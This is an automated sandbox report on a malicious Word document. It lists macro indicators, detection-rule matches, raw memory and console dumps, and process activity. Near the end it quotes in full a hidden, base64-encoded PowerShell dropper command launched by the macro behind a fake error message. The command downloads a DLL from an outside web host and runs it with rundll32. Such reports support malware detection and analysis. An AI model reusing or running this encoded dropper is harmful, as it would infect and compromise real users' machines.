                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0019B7C2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0019ABF8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001977F0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001927F4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001A9BE4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00276C05
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00276E8A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00274121
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0028533C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0027FB04
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00279716
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0027E360
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00285748
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00284DAD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0028C19B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0028A7E4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002783F0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00274828
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00271600
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00283600
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00273618
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0027766F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00285060
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00280C65
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0027D668
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00281C79
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00288E79
                      Source: Info.docOLE, VBA macro line: Private Sub Document_open()
                      Source: VBA code instrumentationOLE, VBA macro: Module J84qpb_vkjnc1hq, Function Document_open
                      Source: Info.docOLE indicator, VBA macros: true
                      Source: Joe Sandbox ViewDropped File: C:\Users\user\Rg0646r\Q90xmrq\M8jklv4.dll 2ED12B3974BE2D729CB7EFDDDFCED6B61E5B00A56EBE27A6CF3FBB080880F2F0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 1000B078 appears 46 times
                      Source: 00000005.00000002.2095373309.0000000000106000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
                      Source: 00000005.00000002.2095728605.0000000001F14000.00000004.00000040.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
                      Source: powershell.exe, 00000005.00000002.2105210846.000000001CCC0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2100613650.0000000001B60000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2097379165.0000000002060000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2099147774.0000000001E80000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
                      Source: classification engineClassification label: mal100.troj.evad.winDOC@42/15@1/4
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$Info.docJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRBCB9.tmpJump to behavior
                      Source: Info.docOLE indicator, Word Document stream: true
                      Source: Info.docOLE document summary: title field not present or empty
                      Source: Info.docOLE document summary: edited time not present or 0
                      Source: C:\Windows\System32\msg.exeConsole Write: ............>........................... .........................%.......%.............#...............................h.......5kU.......%.....
                      Source: C:\Windows\System32\msg.exeConsole Write: ............>...................A.s.y.n.c. .m.e.s.s.a.g.e. .s.e.n.t. .t.o. .s.e.s.s.i.o.n. .C.o.n.s.o.l.e.......H.%.....L.................%.....
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................................................`I.........v.....................K......(.f.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......h...............u.............}..v....H>......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j..... u...............u.............}..v.....>......0...............(.f.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................u.............}..v.....K......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......f...............u.............}..v....8L......0.................f.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....#..................j......................u.............}..v.....y......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....#..................j..... u...............u.............}..v....xz......0.................f.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....7...............N{.j.....Ff...............u.............}..v.....!......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....7................z.j....x"................u.............}..v....."......0...............HDf.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....C...............N{.j.....Ff...............u.............}..v.....)......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....C................z.j....x*................u.............}..v.....*......0...............HDf.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....O...............N{.j.....Ff...............u.............}..v.....1......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....O................z.j....x2................u.............}..v.....2......0...............HDf.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....[.......e.s. .a.r.e. .".S.s.l.3.,. .T.l.s."...".........}..v.....7......0................Cf.....(.......................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....[................z.j.....7................u.............}..v....H8......0...............HDf.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....g.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.5.2.8.............}..v....X<......0................Cf.....$.......................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....g................z.j.....=................u.............}..v.....=......0...............HDf.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....s...............N{.j.....Ff...............u.............}..v....XD......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....s................z.j.....E................u.............}..v.....E......0...............HDf.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................N{.j.....Ff...............u.............}..v....XL......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................z.j.....M................u.............}..v.....M......0...............HDf.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................N{.j.....Ff...............u.............}..v....XT......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................z.j.....U................u.............}..v.....U......0...............HDf.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................N{.j.....Ff...............u.............}..v....X\......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................z.j.....]................u.............}..v.....]......0...............HDf.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................N{.j.....Ff...............u.............}..v....Xd......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................z.j.....e................u.............}..v.....e......0...............HDf.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................N{.j.....Ff...............u.............}..v....Xl......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................z.j.....m................u.............}..v.....m......0...............HDf.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................N{.j.....Ff...............u.............}..v....Xt......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................z.j.....u................u.............}..v.....u......0...............HDf.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................N{.j.....Ff...............u.............}..v....X|......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................z.j.....}................u.............}..v.....}......0...............HDf.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................N{.j.....Ff...............u.............}..v....X.......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................z.j......................u.............}..v............0...............HDf.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................N{.j.....Ff...............u.............}..v....X.......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................z.j......................u.............}..v............0...............HDf.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................N{.j.....Ff...............u.............}..v....X.......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................z.j......................u.............}..v............0...............HDf.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................N{.j.....Ff...............u.............}..v....X.......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................z.j......................u.............}..v............0...............HDf.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................N{.j.....Ff...............u.............}..v....X.......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................z.j......................u.............}..v............0...............HDf.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................N{.j.....Ff...............u.............}..v....X.......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................z.j......................u.............}..v............0...............HDf.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................N{.j.....Ff...............u.............}..v....X.......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................z.j......................u.............}..v............0...............HDf.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....'...............N{.j.....Ff...............u.............}..v....X.......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....'................z.j......................u.............}..v............0...............HDf.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....3...............N{.j.....Ff...............u.............}..v....X.......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....3................z.j......................u.............}..v............0...............HDf.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....?...............N{.j.....Ff...............u.............}..v....X.......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....?................z.j......................u.............}..v............0...............HDf.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....K...............N{.j.....Ff...............u.............}..v....X.......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....K................z.j......................u.............}..v............0...............HDf.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....W...............N{.j.....Ff...............u.............}..v....X.......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....W................z.j......................u.............}..v............0...............HDf.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....c...............N{.j.....Ff...............u.............}..v....X.......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....c................z.j......................u.............}..v............0...............HDf.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....o...............N{.j.....Ff...............u.............}..v....X.......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....o................z.j......................u.............}..v............0...............HDf.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....{...............N{.j.....Ff...............u.............}..v....X.......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....{................z.j......................u.............}..v............0...............HDf.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................N{.j.....Ff...............u.............}..v....X.......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................z.j......................u.............}..v............0...............HDf.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................N{.j.....Ff...............u.............}..v....X.......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................z.j......................u.............}..v............0...............HDf.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................N{.j.....Ff...............u.............}..v....X.......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................z.j......................u.............}..v............0...............HDf.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................N{.j.....Ff...............u.............}..v....X.......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................z.j......................u.............}..v............0...............HDf.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................N{.j.....Ff...............u.............}..v....X.......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................z.j......................u.............}..v............0...............HDf.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................N{.j.....Ff...............u.............}..v....X$......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................z.j.....%................u.............}..v.....%......0...............HDf.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................N{.j.....Ff...............u.............}..v....X,......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................z.j.....-................u.............}..v.....-......0...............HDf.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................N{.j.....Ff...............u.............}..v....X4......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................z.j.....5................u.............}..v.....5......0...............HDf.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................N{.j.....Ff...............u.............}..v....X<......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................z.j.....=................u.............}..v.....=......0...............HDf.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................N{.j.....Ff...............u.............}..v....XD......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................z.j.....E................u.............}..v.....E......0...............HDf.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................N{.j.....Ff...............u.............}..v....XL......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................z.j.....M................u.............}..v.....M......0...............HDf.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................N{.j.....Ff...............u.............}..v....XT......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................z.j.....U................u.............}..v.....U......0...............HDf.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................N{.j.....Ff...............u.............}..v....H\......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................z.j.....]................u.............}..v.....]......0...............HDf.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....#...............N{.j.....Ff...............u.............}..v....(d......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....#................z.j.....d................u.............}..v....`e......0...............HDf.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v..../...............N{.j.....Ff...............u.............}..v.....j......0.......................r.......................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v..../................z.j....hk................u.............}..v.....k......0...............HDf.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....;....... .......N{.j.....Ff...............u.............}..v....xo......0................Cf.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....;................z.j....0p................u.............}..v.....p......0...............HDf.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....E.................u.............}..v............0.................f.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....E.................u.............}..v....`9/.....0.................f.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
                      Source: C:\Windows\System32\msg.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: unknownProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Rg0646r\Q90xmrq\M8jklv4.dll #1
                      Source: Info.docVirustotal: Detection: 69%
                      Source: Info.docReversingLabs: Detection: 56%
                      Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                      Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & POwersheLL -w hidden -ENCOD IAAkAEUAMwBTAHkAIAAgAD0AIABbAFQAWQBQAEUAXQAoACIAewA0AH0AewAzAH0AewAwAH0AewAxAH0AewA1AH0AewAyAH0AIgAtAGYAJwBNAC4ASQBvAC4ARAAnACwAJwBpAFIAZQAnACwAJwBUAE8AUgBZACcALAAnAFMAdABlACcALAAnAHMAeQAnACwAJwBDACcAKQAgADsAIAAgAFMAZQBUAC0ASQBUAEUATQAgAFYAQQBSAEkAYQBiAEwARQA6AGkANwBSAHAAVgB6ACAAIAAoAFsAVABZAFAARQBdACgAIgB7ADEAfQB7ADQAfQB7ADIAfQB7ADAAfQB7ADYAfQB7ADMAfQB7ADcAfQB7ADUAfQAiAC0AZgAgACcARQBUAC4AUwBlAFIAVgBpACcALAAnAFMAJwAsACcAVABFAG0ALgBOACcALAAnAEkATgBUACcALAAnAHkAUwAnACwAJwBBAG4AQQBnAEUAcgAnACwAJwBDAGUAUABvACcALAAnAE0AJwApACkAIAAgADsAJABYAHMAZQBqAGoAbwBvAD0AKAAnAE4AJwArACgAJwBhAHYAYwAnACsAJwBsAGcAJwApACsAJwB1ACcAKQA7ACQAUwBsAGYAcgAxAGcAcAA9ACQAUgBwAGIANQA2AHQANAAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAVQA5AG4AeQBiAGoAcwA7ACQAVwB3AHUAaABjAGYAcwA9ACgAKAAnAFUAXwBtACcAKwAnADQAawAnACkAKwAnAHAAcQAnACkAOwAgACAAKABnAEUAVAAtAHYAQQBSAEkAYQBCAGwAZQAgACAAZQAzAHMAWQAgAC0AdgBBAGwAVQBlAE8AbgAgACkAOgA6ACIAQwBSAGUAYQBUAEUARABpAHIAZQBgAGMAYABUAG8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAWQAnACsAJwBiACcAKwAnAHMAUgAnACsAKAAnAGcAMAA2ADQAJwArACcANgByAFkAYgBzACcAKwAnAFEAJwArACcAOQAnACkAKwAoACcAMAB4AG0AJwArACcAcgBxACcAKwAnAFkAYgAnACkAKwAnAHMAJwApACAAIAAtAFIARQBQAGwAYQBDAGUAIAAoACcAWQAnACsAJwBiAHMAJwApACwAWwBjAEgAQQByAF0AOQAyACkAKQA7ACQASwAzADAAOQBxAHcAMQA9ACgAKAAnAFIAcQAnACsAJwByAG0AJwApACsAKAAnAGIAMgAnACsAJwA4ACcAKQApADsAIAAoACAATABzACAAIAB2AGEAcgBpAEEAYgBsAGUAOgBpADcAcgBQAHYAWgAgACkALgB2AGEATABVAGUAOgA6ACIAUwBFAGMAVQByAGkAYABUAFkAcABSAG8AYABUAE8AYwBgAG8AbAAiACAAPQAgACgAKAAnAFQAbABzACcAKwAnADEAJwApACsAJwAyACcAKQA7ACQATgBtAGgAMQB3AG0AZgA9ACgAKAAnAFgAMwBiADYAJwArACcAZwAnACkAKwAnAGEAJwArACcAbwAnACkAOwAkAE8AagB6AF8AdwBhADcAIAA9ACAAKAAnAE0AJwArACgAJwA4AGoAawBsACcAKwAnAHYANAAnACkAKQA7ACQAWABnAHQAdwB6AGcAaAA9ACgAKAAnAEMAYwAnACsAJwBrADAAaAAnACkAKwAnADEANgAnACkAOwAkAFEAcQBhAHkAdQA2AGgAPQAoACcAQgAnACsAKAAnAGUANgAnACsAJwBmACcAKQArACgAJwByACcAKwAnAHcAMAAnACkAKQA7ACQASgBkAGcAegBhADUAbwA9ACQASABPAE0ARQArACgAKAAnAHsAMAAnACsAJwB9AFIAZwAwADYANAA2AHIAJwArACcAewAnACsAJwAwAH0AUQA5ADAAJwArACcAeABtAHIAcQB7ACcAKwAnADAAfQAnACkAIAAtAEYAIAAgAFsAQwBoAEEAUgBdADkAMgApACsAJABPAGoAegBfAHcAYQA3ACsAKAAoACcALgAnACsAJwBkAGwAJwApACsAJwBsACcAKQA7ACQATgAwADUAcQA1AHQANQA9ACgAJwBPACcAKwAoACcAXwAnACsAJwAzACcAKwAnAGUAMgBwAGYAJwApACkAOwAkAEcAawBoAG0AMQB0AGcAPQBuAGUAVwAtAE8AYgBgAGoAYABFAEMAVAAgAE4AZQBUAC4AVwBFAEIAQwBsAGkAZQBOAHQAOwAkAEoAawBkAHkAcwAwAG8APQAoACgAKAAoACcAaAB0ACcAKwAnAHQAJwArACcAcAA6AEoAJwArACcAKQAoADMAcwAyACkAJwApACkAKwAoACcAKAAnACsAJwBKACkAKAAzAHMAMgAnACsAJwApACcAKQArACgAKAAnACgAegBoACcAKwAnAG8AJwApACkAKwAoACcAbgBnAHMAJwArACcAaAAnACsAJwBpAHgAaQBuAGcAYwAnACsAJwBoAHUAYQAnACkAKwAoACcAbgAnACsAJwBnAC4AJwApACsAJwBjACcAKwAnAG8AbQAnACsAKAAoACcASgApACgAMwBzADIAJwArACcAKQAnACkAKQArACcAKAAnACsAJwB3AHAAJwArACgAJwAtACcAKwAnAGEAZABtAGkAbgBKACcAKQArACgAKAAnACkAKAAnACkAKQArACgAKAAnADMAcwAnACsAJwAyACkAJwApACkAKwAoACgAJwAoAE8AVABtAEoAJwArACcAKQAoACcAKwAnA
                      Source: unknownProcess created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
                      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAkAEUAMwBTAHkAIAAgAD0AIABbAFQAWQBQAEUAXQAoACIAewA0AH0AewAzAH0AewAwAH0AewAxAH0AewA1AH0AewAyAH0AIgAtAGYAJwBNAC4ASQBvAC4ARAAnACwAJwBpAFIAZQAnACwAJwBUAE8AUgBZACcALAAnAFMAdABlACcALAAnAHMAeQAnACwAJwBDACcAKQAgADsAIAAgAFMAZQBUAC0ASQBUAEUATQAgAFYAQQBSAEkAYQBiAEwARQA6AGkANwBSAHAAVgB6ACAAIAAoAFsAVABZAFAARQBdACgAIgB7ADEAfQB7ADQAfQB7ADIAfQB7ADAAfQB7ADYAfQB7ADMAfQB7ADcAfQB7ADUAfQAiAC0AZgAgACcARQBUAC4AUwBlAFIAVgBpACcALAAnAFMAJwAsACcAVABFAG0ALgBOACcALAAnAEkATgBUACcALAAnAHkAUwAnACwAJwBBAG4AQQBnAEUAcgAnACwAJwBDAGUAUABvACcALAAnAE0AJwApACkAIAAgADsAJABYAHMAZQBqAGoAbwBvAD0AKAAnAE4AJwArACgAJwBhAHYAYwAnACsAJwBsAGcAJwApACsAJwB1ACcAKQA7ACQAUwBsAGYAcgAxAGcAcAA9ACQAUgBwAGIANQA2AHQANAAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAVQA5AG4AeQBiAGoAcwA7ACQAVwB3AHUAaABjAGYAcwA9ACgAKAAnAFUAXwBtACcAKwAnADQAawAnACkAKwAnAHAAcQAnACkAOwAgACAAKABnAEUAVAAtAHYAQQBSAEkAYQBCAGwAZQAgACAAZQAzAHMAWQAgAC0AdgBBAGwAVQBlAE8AbgAgACkAOgA6ACIAQwBSAGUAYQBUAEUARABpAHIAZQBgAGMAYABUAG8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAWQAnACsAJwBiACcAKwAnAHMAUgAnACsAKAAnAGcAMAA2ADQAJwArACcANgByAFkAYgBzACcAKwAnAFEAJwArACcAOQAnACkAKwAoACcAMAB4AG0AJwArACcAcgBxACcAKwAnAFkAYgAnACkAKwAnAHMAJwApACAAIAAtAFIARQBQAGwAYQBDAGUAIAAoACcAWQAnACsAJwBiAHMAJwApACwAWwBjAEgAQQByAF0AOQAyACkAKQA7ACQASwAzADAAOQBxAHcAMQA9ACgAKAAnAFIAcQAnACsAJwByAG0AJwApACsAKAAnAGIAMgAnACsAJwA4ACcAKQApADsAIAAoACAATABzACAAIAB2AGEAcgBpAEEAYgBsAGUAOgBpADcAcgBQAHYAWgAgACkALgB2AGEATABVAGUAOgA6ACIAUwBFAGMAVQByAGkAYABUAFkAcABSAG8AYABUAE8AYwBgAG8AbAAiACAAPQAgACgAKAAnAFQAbABzACcAKwAnADEAJwApACsAJwAyACcAKQA7ACQATgBtAGgAMQB3AG0AZgA9ACgAKAAnAFgAMwBiADYA